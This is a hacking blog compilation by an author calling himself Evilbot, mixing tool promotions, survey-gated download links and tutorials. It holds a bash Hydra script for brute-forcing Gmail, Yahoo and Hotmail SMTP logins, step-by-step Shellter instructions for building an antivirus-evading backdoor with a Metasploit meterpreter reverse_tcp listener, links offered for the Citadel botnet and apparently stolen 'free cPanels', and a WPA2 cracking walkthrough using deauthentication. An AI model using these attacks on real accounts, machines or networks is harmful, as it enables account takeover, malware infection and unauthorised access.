EvilScript For Kali Linux


EvilScript : All things to do after installing Kali Linux and Add more awesome hacking tools to your Kali Linux system.
- change source.list kali linux rolling
- modify video tutorial links
- add more tool
- add vmware-tools
 
 
Watch The Video & Subscribe 

Here Is The Link Of EvilScript : ( https://github.com/MrEvilbot/EvilScript/ )

  1. Open Terminal 
  2. git clone ( LINK )
  3. cd Desktop
  4. ls
  5. cd EvilScript
  6. chmod +x  (file)
  7. ./(file)
Enjoy :)






1B Wordslist For Brute Force Attack By Evilbot


Hello Everyone ,
                              Today i'm gonna share with you guys something cool and amazing ,
I'm going to share with you guys Best 1B wordslists for Brute Force Attack with the most common and amazing passwords.
For Any Brute Force Attack I'll Recommend You Guys To Download This Amazing 1B Dictionary!!
Hope You Guys Will Enjoy :-

http://downloadity.net/file/05888654



Bypass Antivirus And Get Bind Shell In Windows




It's a very simple and easy method to get bind shell in any windows with ARCANUS :

Get ARCANUS : https://goo.gl/VTHly8

Watch This Tutorial & Share This With Your Friends ~

 

~ Feel Free To Give Feedback ~

Brute-Force Email Using a Simple Bash Script

Hi my name is Evilbot and I am not a script kiddy brat from Xbox Live asking you how to boot someone offline for being mean to me. I am an amateur white hat hacker hoping to learn and teach.
THC Hydra is very prominent online brute-force tool and has been featured in Null-Byte quite a lot. It is dictionary based, as you will have to provide a wordlist with possible passwords. You can read the README here:https://github.com/vanhauser-thc/thc-hydra
Today ,we will be focusing on brute forcing email, or more specifically, SMTP, also known as the Simple Mail Transfer Protocol. It is your standard protocol for sending electronic mail.
Let's get started!

Step 1Open Up Kali!

Of course, we will be using Kali Linux. I use mine on VMware Workstation, but it won't really matter what you use.


Let's open up Leafpad, or your text editing program of your choice.

Step 2Bash Time!

We're going to write a little bit of script, so that we can save some time instead of going through the hassle of actually typing out parameters.
On Leafpad, type:
#! /bin/bash 
echo Simple Email Cracking Script in bash
echo Written By: Evilbot
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
And after you got it, save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your desktop, but in /root.


Now, I am going to explain how the script works.
#! /bin/bash simply means that everything is in bash.
echo simply means to tell the computer to say something. For example, echo Hello World means to tell the computer to output Hello World.
read is asking for user input. this will then store your input into a variable. read email would mean for you to enter something, and it will be stored into the email.
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you may tell, there are some parameters with a $. This is the variable with stored values you previously input in the read command.

Step 3Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.
Let's open up Terminal. Type in
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash file)

Step 4Execute!


Now we can finally use it!
In terminal, let's type
./yourscript.sh


 It's working!


The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is Gmail. After that, you provide the gmail account, such as johndoe@gmail.com and give a wordlist directory, which you can find some default ones in the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP.
 Thanks for reading, and please provide some feedback :)
You Can Also Download The Script From Here :)
https://mega.nz/#!r5pWTQRA!MvxfuPWckmsV8AyssMvQ2j038V4EzvjjV1NmId-u0A4
 


 

Create FUD PAYLOAD using Kali linux 2.0 - Shellter


 -= Evilbot =-
                                           -= Creating Fud Backdoor - Shellter -=
                                                -= Kali Linux 2.0 ( Rolling ) =- 

Wine32 Must Be Installed :-
Any Exe File :-
Download Shellter From The Link In Description :-
-------
Here I Have The NoIp ( DUC ) EXE File , Copy The File And Paste It On Shellter Folder
Rename The Exe File With Anything You Want :3

Open The New Terminal And Type > cd Desktop/shellter/  > Hit Enter Button Now
Then Type > ls
Then > wine shellter.exe
Now Type A For Auto Operation
PE Target > noip.exe ( But The Name Of The Downloaded EXE File )
Now Wait 1 min
----
Now After some wait Press N For Stealth mode
Then Press L To Select Payload & Then Press 1 and hit ENTER Button
SET HOST > Your IP
SET LPORT > 8080 ( Default )
Hit Enter Button :3 Injection Verified!
Now Type Clear And Start The Service > service postgresql start
Now Type msfconsole
msf > use exploit/multi/handler
Now > set PAYLOAD windows/meterpreter/reverse_tcp
Then > Set LHOST ( IP )
Then > Set LPORT 8080
Then > exploit -j
----------------

 
Watch The Video And Enjoy :)
Must Like The Video And Subscribe and Share :)



Whatsapp: Use 20+ whatsapp in one device

Hello guys , we all know a couple of number is common these days so don’t you think you need all over whatsapp and live in one single device. Guess what yes its possible to do so we can start up all whatsapp. so lets get started.

Its pretty simple guys just follow these simple steps and yeah all link in end of post
  1. Download the whatsapp from below give link.
  2. Install it on your device
  3. After completion verify with which ever number you wish to start whatspp
  4. okay done. If you need all 20 follow same steps for each of them.


http://adf.ly/1bfFZz

Hacking : The Art Of Exploitation


The person who already reads this book i really respect you Because this book 
is Full of Hacking Exploits
Must Buy And Read This Book


Blackhat Hacking Pocket Guide






Looking For Some More Cool Hacking Guide Book ?
Here Buy This Book To Learn More :] Maybe You Guys Thinking Why I'm Saying To You Guys
To Buy These Books ? Well
Knowledge is power , To Become A Smart Person Then Read Books :)




Professional Penetration Testing


This Book is so freaking Cool and Amazing i learn alot from this book too
I highly Recommend You Guys To Purchase This Book

Hacking Beginners


Everyone when comes to hacking world he/she got to many questions in his mind 
like " What should i do ? "
You guys don't need to watch any kind of Tutorials
I Recommend you guys this Book
I bought this book years before and i found this book very helpful its very Cheap price book 
so Don't wait anymore just buy it and Rock n Roll :]

Ghost Squad Hackers Leak Data of US Military Personnel

Ghost Squad Hackers Leak Data of US Military Personnel
All three data dumps amount to 3,415 records
Ghost Squad Hackers dumped the data of US military personnel, according to a Facebook post published today.
The data is on a website on the Dark Web but was added to PasteBin after a few hours as well.
Group leaks data for around 3,400 servicemen
Dump #1 contains 433 records. For each record, with very few exceptions, there's data included such as a person's name, phone number, address lines, city, state, ZIP code, country (all US), email address, age, gender, and income level.
Dump #2 contains 232 records. For each record, there's an email address, first name, last name, address, city, state, ZIP code and phone number.
Dump #3 contains 2,750 records. For each record, the data dump may include a full name, email address, date of birth, address lines, credit card number, credit card expiration date, credit card CVV, credit card type, and two fields marked APO and AE. APO may stand for Automatic Payment Order.
Group says leak is part of ‪#‎OpSilence‬
"The final release for #OpSilence Army database leaked, your empire ran by banks will fall US GOV," the group wrote on Facebook. "You must view these leaks in Tor Browser we are not jeopardizing our freedom."
OpSilence is a hacktivist campaign launched by Ghost Squad Hackers at the start of June. When announced, the group told Softpedia that OpSilence was a campaign against mainstream media sites because they failed to report the true crimes happening in Palestine and Syria.
Previously, Ghost Squad Hackers had also been at the core of OpIcarus, a campaign of DDoS attacks against banks in several countries.
The hackers are associated with the Anonymous movement but have recently started to promote their own name via OpSilence.
Group Squad Hackers loses its leader
One of the most infamous such incidents occurred last summer, when the US killed Junaid Hussein in a drone strike. Hussein was the former leader of the TeaMp0isoN hacking crew, but at the time of his death, he joined the Islamic State's Hacking Division called the Cyber Caliphate.
Maybe this is the reason why, approximately one hour before Ghost Squad Hackers leaked the data, its official leader, a hacker known as Gh0s7, announced on Twitter he was leaving the group.

Free Cpanels



Hello Guys , I got to many email from many peoples Saying to me Please Provide us Cpanels
So its your lucky day guys cuz im not feeling lazy today :]

The List Im Gonna Provide , Don't Use It For Any Bad Purpose


http://reliablefiles.com/file/0585wh


Hit The Download Button & Complete a short survey and get free Cpanels
For Any Kind Of Help Contact Us :-


Citadel Botnet


NOTE :- 

                 Every Ethical Tech We Teach You Here Is Only For Education Purpose

                 For Your Any Damage We Are Not Responsible :]

                 So Please Don't Do Anything Bad !

-----------------------------------------------


What Is Botnet ?

A network of private computers infected with malicious software and controlled as a group without the owners' knowledge, e.g. to send spam.



Citadel Bot ( Zeus Bot ) is most common and most dangerous Bot in these days , Many Spammers And Hackers use It for to Hack Personal Information , Bank Accounts etc

Use It At Your Own Risk
---------------------------

http://filerack.net/file/0585wD
 

The File Is Protected By ShareCash , So Please Complete The Survey and downlaod the file.
 


Cracking WPA/WPA2 – PSK Encryption


About a month ago, to my embarrassment, I learned that my Wi-Fi password was so weak that even my 10 year old neighbour could crack it…
No, not really.

  • A little Disclaimer – The contents of this post are solely for ethical and educational purposes. You may not use it for unethical purposes. The Author or the Website is not responsible for any damage to yourself, your network, or the computers in you network, should something go wrong. (Basically guys, be careful where you use this and please don’t do anything stupid.)

    We’re going to start with a little introduction to Kali Linux, because that is the OS I prefer, is the easiest for this task and comes with all the tools we need. “Kali” is a Linux distribution and is the successor to the much acclaimed Backtrack, which many of you reading this article will probably know of. Now, there are many ways of installing and using Kali, if anyone needs any help, leave in the comments, and I will probably write another post about installing and its basics in the future.
    In this tutorial, I’m going to hack into a Wi-Fi hotspot that I just set up, named – Anonymus.
    Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device.
    Here, we only need (wlan0) which is our Wi-Fi card, so we can disable the others by doing “ifconfig <name of the interface> down”.
    (“lo” does no matter)…


Now, we type “airmon-ng start wlan0”



(airmon-ng is just a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring)
It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by entering “kill <process ID>”.

Now if we do “ifconfig”, it should show us the newly made monitoring interface “mon0”.

 Then, put in, “airodump-ng mon0”.
In the screenshot below, the highlighted bssid is our target (and it is my own), named “Anonymus”, the channel is 13 as we can see under the “CH” column.


 For our next step we type in, “airodump-ng –c <channel> -w <name> –bssid <bssid> mon0”.
Let me explain a few things here, “airodump-ng” is a tool for capturing Wi-Fi packets, “<channel>” means the channel your target is running on, “-w” basically writes a file by the name that succeeds it in “<name>”, (I did “handshake” just for the convenience of it) bssid is a string of numbers specific to a hotspot.




Now, open up a new terminal and type in “aireply-ng -0 0 –a <bssid> mon0”, this command send a deauthentication signal (usually called a deauth packet) to all the devices connected to that hotspot. Then after a few seconds we stop it by “Ctrl+C”. Now, as we can see, the other terminal shows that the WPA Handshake was successfully captured.

We can close both windows at this point, and open a new one. Type “ls”; that should list the files in the current directory. We can clearly see that the files from the above operation are present. But we only need the file ending with “-01.cap”.


 Then we do, “aircrack-ng –w <full location of the wordlist> <the file name>”.
 

 You may be asking what wordlist? What is that sh*t?
A Wordlist is a file containing thousands of known and possible passwords, which you can download from the internet (“specifying from the internet” – We ain’t dumb, boy! :P). The one I used can be found here. The list contains 982,963,904 words exactly all optimized for WPA/WPA2. Would also just like to point out that this is not my work, I got it from forums.hak5.org. It was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) I will be seeding this torrent indefinitely since it is shareware and awesome!

It will then start searching for matching keys in the word list. Now the time that this will take is solely dependent on the strength of the password. The stronger the password the more time will it take. For very strong passwords, check this out. For tips on creating your own strong password – Top 10 Tips to Create a Strong Password
After completion it looks something like the screenshot below. In it, you can see that it tested 45688 keys and my key was the 45689th. I purposely put futurama because frankly, futurama is awesome! Also it is a very weak password (People reading this, if your password is “futurama”, you’re cool! The Hell? Change it right now!)





Now that we know the password, lets test it…

Annnnd… Voila! it works!
Knowing this you will be…
But beware, don’t use it on a Lannister… (Because a Lannister always pays his debts :P)
For those of you who didn’t understand that reference, xD